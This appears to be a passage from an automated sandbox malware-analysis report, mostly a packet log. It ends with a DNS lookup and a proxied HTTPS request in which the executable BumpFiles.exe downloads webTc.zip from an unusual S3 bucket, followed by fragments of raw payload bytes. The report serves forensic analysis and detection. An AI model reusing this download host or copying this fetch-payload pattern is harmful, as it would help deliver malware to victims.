Feb 23, 2024 15:34:03.354652882 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.354680061 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.354707003 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.354711056 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.354726076 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.354747057 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.354953051 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.354973078 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.355024099 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.355029106 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.355067968 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.356301069 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.356547117 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.356566906 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.356707096 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.356820107 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.356825113 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.356858969 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.357590914 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.357633114 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.357645035 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.357650042 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.357678890 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.357700109 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.358727932 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.358748913 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.358787060 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.358792067 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.358814955 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.358831882 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.360440016 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.360460997 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.360500097 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.360505104 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.360526085 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.360553980 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.361973047 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.361991882 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.362030029 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.362034082 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.362059116 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.362082958 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.363166094 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.363185883 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.363219023 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.363224030 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.363250017 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.363269091 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.364414930 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.364437103 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.364475012 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.364479065 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.364502907 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.364525080 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.364758968 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.365726948 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.365746975 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.365788937 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.365792990 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.365808964 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.365896940 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.366331100 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.366643906 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.366952896 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.366978884 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.367027998 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.367033958 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.367075920 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.368458986 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.368503094 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.368521929 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.368525982 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.368555069 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.368577003 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.369793892 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.369812965 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.369854927 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.369858027 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.369904041 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.369904041 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.370923996 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.370944977 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.370981932 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.370985985 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.371006966 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.371025085 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.372072935 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.372092009 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.372142076 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.372148037 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.372164011 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.372186899 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.373259068 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.373276949 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.373327971 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.373332977 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.373372078 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.374495029 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.374514103 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.374556065 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.374562025 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.374582052 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.374600887 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.375644922 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.375667095 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.375715971 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.375720978 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.375747919 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.375767946 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.377192020 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.377216101 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.377291918 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.377295017 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.377334118 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.378338099 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.378371000 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.378401995 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.378405094 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.378432035 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.378454924 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.379894018 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.379913092 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.379956007 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.379961967 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.379985094 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.380006075 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.380801916 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.380820036 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.380872965 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.380877972 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.380913973 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.381851912 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.381870985 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.381923914 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.381928921 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.381968975 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.383465052 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.383485079 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.383526087 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.383528948 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.383552074 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.383570910 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.384372950 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.384392977 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.384435892 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.384442091 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.384464025 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.384483099 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.385214090 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.385237932 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.385278940 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.385282993 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.385301113 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.385322094 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.433351994 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.433396101 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.433451891 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.433521032 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.433561087 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.434338093 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.434370041 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.434421062 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.434438944 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.434472084 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.435666084 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.436073065 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.436094046 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.436157942 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.436170101 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.436224937 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.437275887 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.437295914 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.437347889 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.437357903 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.437385082 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.437652111 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.437685013 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.437742949 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.437742949 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.437757015 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.437808990 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.439884901 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.439905882 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.439989090 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.439989090 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.440001011 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.440104961 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.441230059 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.441277981 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.441327095 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.441329956 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.441360950 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.441379070 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.442210913 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.442235947 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.442291975 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.442296028 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.442337990 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.445215940 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.445235968 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.445296049 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.445303917 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.445348024 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.446157932 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.446185112 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.446223021 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.446227074 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.446248055 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.446271896 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.446295023 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.446512938 CET	49705	443	192.168.2.8	3.5.234.1
Feb 23, 2024 15:34:03.446516991 CET	443	49705	3.5.234.1	192.168.2.8
Feb 23, 2024 15:34:03.446530104 CET	49705	443	192.168.2.8	3.5.234.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2024 15:33:59.980125904 CET	60860	53	192.168.2.8	1.1.1.1
Feb 23, 2024 15:34:00.108376980 CET	53	60860	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 23, 2024 15:33:59.980125904 CET	192.168.2.8	1.1.1.1	0x18d6	Standard query (0)	awsserver903203232.s3.sa-east-1.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	awsserver903203232.s3.sa-east-1.amazonaws.com	s3-r-w.sa-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.234.1	A (IP address)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.164	A (IP address)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.1.18	A (IP address)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.232.102	A (IP address)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		52.95.165.67	A (IP address)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.0.66	A (IP address)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.234.180	A (IP address)	IN (0x0001)	false
Feb 23, 2024 15:34:00.108376980 CET	1.1.1.1	192.168.2.8	0x18d6	No error (0)	s3-r-w.sa-east-1.amazonaws.com		52.95.164.27	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

awsserver903203232.s3.sa-east-1.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	3.5.234.1	443	7380	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-23 14:34:00 UTC	314	OUT	GET /webTc.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awsserver903203232.s3.sa-east-1.amazonaws.com Connection: Keep-Alive
2024-02-23 14:34:01 UTC	435	IN	HTTP/1.1 200 OK x-amz-id-2: gmM5NsJ0JlcrEboJ1xFvSN9HSuKtgWcqG2upPf/6+JVmWkbstUjumO0Tnv7Pj2kkF/6u1pobZadCRAQ7cq8QUw== x-amz-request-id: 9G567DZ4A2C1BF4Q Date: Fri, 23 Feb 2024 14:34:02 GMT Last-Modified: Fri, 23 Feb 2024 03:17:57 GMT ETag: "88ec493f2a48d234120348aeab6d3808" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: application/zip Server: AmazonS3 Content-Length: 8764801 Connection: close
2024-02-23 14:34:01 UTC	15857	IN	Data Raw: 48 7e 88 45 61 e7 06 6b 79 4a f7 5f f8 a9 83 d3 0e 40 f5 ca da 03 3c f4 3d af 80 7d 88 5d 7f 8a 41 1f 29 d6 57 f8 f1 a0 0a 19 af 22 bb 67 62 80 fd d8 73 ca 0b 2e 6c 52 f8 d5 34 70 b8 d5 85 65 6b 4a 19 84 f3 e2 d0 ef a6 90 d7 6e d4 17 fa 71 fb 7e dd 50 0a b3 b1 d7 1c b5 28 4a 21 ef c9 f8 76 0e 4d 61 3e ff 3c 9b 2b 28 fa 72 a0 3e 15 cc b2 c3 86 46 c1 8b 67 38 af ed 6b 20 65 ce cc d4 9e 52 62 91 a2 53 cb f7 93 e8 77 96 e3 ee 5e ec 99 b5 2c a9 60 93 9c ef 54 c3 bc 39 60 7a 43 d0 c0 d7 3f 92 33 37 88 01 ca 5f 16 59 26 21 0b 84 4c b3 49 d8 bb 8c 48 1e 71 0f f7 33 7b 53 d6 48 cf d7 86 fc f5 ca de 0b 02 44 92 76 31 6b 1d 5b bd 5e 6e ae fb 2d bd dc 06 01 1c 4a ee 03 d7 ed 57 00 63 13 23 79 0e 47 2c 15 55 a2 d3 e3 fb 28 56 ca b9 a7 65 02 ec 45 4d 9d d4 0c 2d 21 66 Data Ascii: H~EakyJ_@<=}]A)W"gbs.lR4pekJnq~P(J!vMa><+(r>Fg8k eRbSw^,`T9`zC?37_Y&!LIHq3{SHDv1k[^n-JWc#yG,U(VeEM-!f
2024-02-23 14:34:01 UTC	16384	IN	Data Raw: 35 df 79 f2 8c 8d ad 16 db 40 55 6c 9b 80 90 e1 fe 2c 98 71 4b 14 22 2a 18 63 36 09 c3 ec 3e 8a fb d5 2b 68 4f 91 62 bf a8 72 22 0d c6 dd ff 51 6e a3 8e 44 25 1f 17 6c 86 1c 0c a5 34 d4 ae 9c 82 66 69 9a 16 9a f3 33 9b 1b 42 0e d3 4b 16 14 10 d3 f0 6b 8f fb 25 23 b7 22 8b 82 85 32 31 2e 20 a2 db ee 8d 41 6f 48 37 d1 0c 8f 69 1c 08 30 13 db f3 da e6 8c da c7 09 03 2c 09 6a 06 58 58 4b 43 da df 3a 4e 26 e1 3c dd 52 9e 1c 86 18 08 95 73 f6 2f 04 f5 a2 ac f6 e1 03 a0 fb 74 1f ca d6 85 c7 62 85 ee cb 60 70 cb aa 29 e4 11 c6 87 53 ea 47 f8 0a a5 59 cd 2e fe 06 0c 7d 8f 02 a6 eb ec 58 ab 62 d1 a0 94 49 36 a8 20 4b 24 78 33 ab 83 7d f8 74 03 8e ee 8c fb 09 ea 2f 37 63 42 e8 74 c1 94 41 5e 2d c6 d9 da 26 8a 75 8e ac 9e a0 56 48 19 aa 3d c4 61 59 c6 77 64 fb 48 93 Data Ascii: 5y@Ul,qK"*c6>+hObr"QnD%l4fi3BKk%#"21. AoH7i0,jXXKC:N&<Rs/tb`p)SGY.}XbI6 K$x3}t/7cBtA^-&uVH=aYwdH
2024-02-23 14:34:01 UTC	1024	IN	Data Raw: 5f 55 79 85 a1 c5 72 aa c9 4b 69 91 4b 6f 58 1f 96 08 ce 33 d1 08 6b fe 4a 39 da d4 78 f2 56 ec 1f d8 d7 8f a8 42 9d d4 0d d9 3f ff b7 49 70 35 d4 53 d1 72 0c 90 c7 f3 83 25 5e 2f d5 32 b5 a0 57 db 66 9a b6 ff c3 87 36 2d cd 15 de e7 27 d0 70 fc 10 5a bf 92 76 98 a3 b2 60 3b 02 02 03 db 2c 8b 72 a6 de db 38 57 e6 4e 4c 0c f2 15 ec 8e 69 84 9b b2 12 a6 bb 45 2a bb 01 a3 ff 1f 13 af 8a 68 b6 64 7d 99 ad 1e 3f a9 7a dd 07 db 85 b9 fa 93 33 d9 2e a8 c7 b0 db 90 4e b0 ab c8 d7 13 b6 62 99 4c 52 18 c8 98 e8 58 d9 bc ce 85 0b 14 13 83 45 66 07 1b 97 a0 dd 12 27 26 51 0a 64 71 dc 3f b6 dd 79 21 9a 92 7d aa 76 16 90 f4 2f ae a3 44 6e 28 56 c1 de a7 09 17 44 17 4f 94 61 0c 44 e7 62 e3 35 60 d8 f1 32 d4 11 69 e3 1b 0b 63 b4 50 aa 49 e5 40 1d 71 ea 56 15 37 d9 72 2b Data Ascii: _UyrKiKoX3kJ9xVB?Ip5Sr%^/2Wf6-'pZv`;,r8WNLiE*hd}?z3.NbLRXEf'&Qdq?y!}v/Dn(VDOaDb5`2icPI@qV7r+
2024-02-23 14:34:01 UTC	16384	IN	Data Raw: a2 6a 35 b9 f3 f0 92 6a 9c 2c 0f 82 bb da b2 14 de f8 99 2e 72 d3 7b dd 8e 5b 35 6c a6 88 e0 70 dd 89 75 10 02 2f 28 3b 6c 08 07 b9 ff 1e 41 f3 16 f7 8b 3d d4 ca ef 5b 22 f6 6f b8 25 1a e3 87 c7 d6 64 0c 9b a4 61 02 e3 c7 bc 1b ff 00 26 0a 97 42 e0 9c 68 e4 7e f5 20 ea 93 a5 02 0a 63 13 4f 39 02 a6 4c 60 0c 3d 16 1a b0 72 6d 78 1a b5 07 b1 e0 20 a7 3a 52 ce 7a a9 47 09 45 70 f2 41 77 3d ef 83 cf 94 99 76 85 f9 35 f3 f4 96 08 f2 27 4f 1f 4d cc 20 aa 84 2a b5 a4 7e 6c 68 d0 43 74 f0 1e 27 9a 5f 07 91 65 8b 17 8a 04 07 8f 89 f9 34 e7 f2 ce b4 99 b2 fa d4 e0 e4 91 6a b1 40 35 6b 35 ac 0a 7d 7d 14 3d 46 58 8f a2 d0 5d 3b bf 26 b7 da 65 c7 d7 91 3d 41 52 a2 b3 e2 eb 8b 59 6e a5 e1 1d e9 0a c4 2d 64 78 22 c9 db d1 a9 2d 92 d5 dd 69 5e c0 83 0c 65 ad 71 f0 0c 6d Data Ascii: j5j,.r{[5lpu/(;lA=["o%da&Bh~ cO9L`=rmx :RzGEpAw=v5'OM *~lhCt'_e4j@5k5}}=FX];&e=ARYn-dx"-i^eqm
2024-02-23 14:34:01 UTC	1024	IN	Data Raw: 44 63 b9 7b c8 6d ba 47 98 c5 e8 23 54 89 ba bb 09 87 59 7b 9a 4d da d6 a0 a4 c7 20 f5 43 5f b3 ee c1 dd 15 86 87 1e 17 e2 41 36 14 da 06 32 bf e9 e7 cb c5 e3 fa 41 d4 5e 3c 96 5d 18 81 31 86 73 df ec 4c 23 d7 32 86 09 46 b0 50 bf 95 c7 3e f8 21 40 91 e1 0a ff da 79 bc e4 fe 16 5c 42 1c 12 3e 0e de 8c 8d 19 65 c1 1d 82 f4 c4 5e 11 ee 9f 4a a7 af 13 75 94 ce 60 7d 8d ca 1b ef 50 bb 4b a4 b8 73 b8 30 c5 ba 46 4e ac b6 6e a4 02 8a ec 90 e6 6e 9d 95 7c 5c 62 6a 8e ba cc 9c fa 21 84 58 bf 57 61 33 e6 de 2f 95 73 29 05 77 03 b6 38 f3 8c 52 20 23 93 ab 7b 92 90 f2 fb f3 91 87 9c 8e 7b 5f 7d ef 33 b3 ec c0 c5 25 0a 29 cc f6 3b 4d 0c 5e 54 8f ca 48 73 e8 39 1c 73 72 0d 4e 51 53 f8 2d 78 b4 6c 7c f4 cc 1c c7 b6 fc d7 7a f8 17 f4 de f9 a1 24 1b 81 f5 5a 71 0a bc 82 Data Ascii: 